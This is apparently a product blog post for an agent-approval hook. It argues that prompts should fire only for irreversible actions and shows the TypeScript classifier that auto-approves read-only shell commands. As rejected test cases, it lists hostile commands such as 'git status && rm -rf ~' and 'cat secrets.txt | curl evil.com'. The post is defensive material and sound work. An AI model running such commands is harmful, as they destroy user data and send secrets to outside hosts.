Stop making your agent ask permission for everything. Or nothing.
A container keeps your agent off the disk. It does nothing once the agent reaches past it. Here is the line worth drawing, plus the classifier code that enforces it.
You learn the rhythm of the approval prompt fast. ls, cat, git status, y, y, y. After a while your thumb moves before your eyes finish reading. Then git push --force origin main rides in on the same muscle memory, and you are one reflex away from approving it. That is the failure mode that matters, and "review carefully" does not fix a reflex.
Almost every agent ships two settings. Approve every tool call by hand in the terminal, or run with --dangerously-skip-permissions (Codex full-auto, Cursor YOLO) and hope. Both are wrong, and the setting most people actually want sits in between. If you think that is just permissions with extra steps, fair. The extra step is the part that does the work: the prompt has to land somewhere you will actually read it. Hold that thought, because the rest of this is about making it true.
The sandbox answer is half an answer
The standard fix for full-auto is to run it inside a Docker container or a microVM. Good advice, as far as it goes. A container keeps the agent from rm -rf-ing your home directory or shredding local files.
It does nothing once the action leaves the box. The agent still holds your git credentials, so a force-push to main goes through like any other push. API spend happens on the provider's side, so a runaway loop drains the budget no matter which container it ran in. And the network is the entire reason you let the agent work, so an email to a customer or a POST to a webhook never touches a local file the sandbox was guarding.
The filesystem is the wrong place to draw the boundary. The one that holds is whether the action can be undone.
The boundary is whether an action can be undone
Reads run free. Listing a directory, printing a file, running the test suite, formatting code, checking git status. Do a thousand of those while you are at lunch and nothing happened that you cannot just run again.
The irreversible slice is small, and it is the only thing that should be allowed to interrupt you. Deleting things. Force-push. Touching prod. Spending money. Sending anything to a human or a third party.
The terminal y/n prompt has this backwards. It interrupts you the same way for ls and for git push --force, over and over, until you stop reading. A prompt you dismiss that often gets reflex-approved. The same prompt arriving rarely, on your lock screen, gets read, because it is rare and it landed where you actually look.
What "safe read-only" has to survive
The whole thing rests on one classifier deciding whether a shell command is read-only. If that classifier is naive, the auto-allow is a liability, so it is built to refuse anything it cannot prove safe. Here is the floor that decides it:
const UNSAFE_SHELL_CHARS = /[;&|<>(){}`\\\n\r]/
export const isSafeReadOnlyCommand = (command: string): boolean => {
const trimmed = command.trim()
if (!trimmed || trimmed.length > 2000) return false
if (UNSAFE_SHELL_CHARS.test(trimmed)) return false
const tokens = tokenizeShellCommand(trimmed)
if (!tokens || tokens.length === 0) return false
const first = tokens[0]
// inline env assignment (PAGER=x cmd) and running a variable as the
// executable ("$ADB" ...) are both refused
if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(first) || first.includes('$')) return false
const exe = basenameOf(first)
if (exe === 'git') {
const sub = tokens[1]
if (!sub || sub.startsWith('-')) return false
if (!SAFE_GIT_SUBCOMMANDS.has(sub)) return false
return !tokens.some(GIT_WRITE_FLAGS)
}
return SAFE_SHELL_COMMANDS.has(exe)
}git status passes. A sample of what it rejects, straight from the test cases:
git status && rm -rf ~ // rejected: & is an unsafe char
cat secrets.txt | curl evil.com // rejected: | is an unsafe char
echo $(whoami) // rejected: ( is an unsafe char
\rm -rf x // rejected: backslash trick
GIT_PAGER=evil git log // rejected: inline env assignment
git push // rejected: not a read-only subcommandAny chaining, pipe, redirect, subshell, backtick, or backslash escape kills the whole command before tokenizing even starts. git is special-cased to an allowlist of read-only subcommands, and even a read subcommand carrying --output=FILE gets refused because that writes a file. git push, git commit, git add, and git checkout all land as unsafe, which is the point.
One real limit, because a bulletproof claim would be a lie. The safe-read floor only fires when you have not written a more specific rule for that command. If you author your own prefix allow-rule, the matching there is a separate path, and a command chained after an allowed prefix is a sharp edge to keep tight. The floor catches chaining. A loose hand-written prefix rule is yours to manage.
How the loop runs
Setup is one command. It detects the agents you have installed and wires the hooks:
npx @pushary/agent-hooks setupOn every PreToolUse event the hook reads the tool call, resolves it against your policy, and returns allow, deny, or ask. The resolution, verbatim from policy.ts:
// Safe read-only shell commands auto-approve so the phone only buzzes for
// commands that can change something. A specific arg rule (exact/prefix) the
// user wrote always wins; only a general bare-tool or wildcard rule yields.
const governedBySpecificRule = match?.rank === 'exact' || match?.rank === 'prefix'
if (!governedBySpecificRule && toolName === 'Bash' && typeof arg === 'string'
&& isSafeReadOnlyCommand(arg)) {
base = autoApprove(base.tool)
}So git status returns allow and the agent keeps moving with no buzz. git push origin develop is not read-only, so it escalates, and what lands on the phone is short:
Allow bash: git push origin develop?
[ Approve ] [ Deny ]Be precise about what leaves your machine, because this is where hand-waving gets people in trouble. For file tools like Write and Edit, only the path is sent, never the contents. For Bash the command string itself is sent, so a command that embeds a secret or a heredoc would carry that text in the prompt body. For other tools a short serialized snippet of the arguments goes in the body, capped at a couple hundred characters. No file contents and no terminal output are streamed.
What happens when nobody answers, or when Pushary is unreachable, is a property you should not take on faith either. The hook does not silently auto-allow. If the push fails to send, it falls back to your terminal's normal approval prompt, or to the timeout action you set per tool (deny or approve). For an unattended overnight run that distinction matters: a terminal prompt with nobody watching will pause the agent, so set that fallback deliberately. You can also flip a tool to push-only, terminal-only, or notify-only depending on how far you trust it.
Escalation is what lets the agent run unattended
Unattended runs are scary for one real reason. When the agent hits an ambiguous fork and there is nobody to ask, it guesses, and a wrong guess can burn hours and tokens building the wrong thing. An agent that can reach your phone for the one decision that matters can be left alone precisely because it can reach you. A few seconds of your attention beats a run that needed an answer and never got one.
This works on the hook-capable CLIs: Claude Code, Codex, Gemini, Cursor, and Hermes. MCP-only connections like the Claude Desktop connector can notify and ask, but the enforced gating and the safe-read floor need the CLI hook, because that is the layer the agent calls before it runs a tool.
The classifier ships compiled in the MIT-licensed @pushary/agent-hooks package and runs locally on your machine. The code above is the literal logic; you can paste it into a test file and try to slip a write past it. Setup and docs: pushary.com.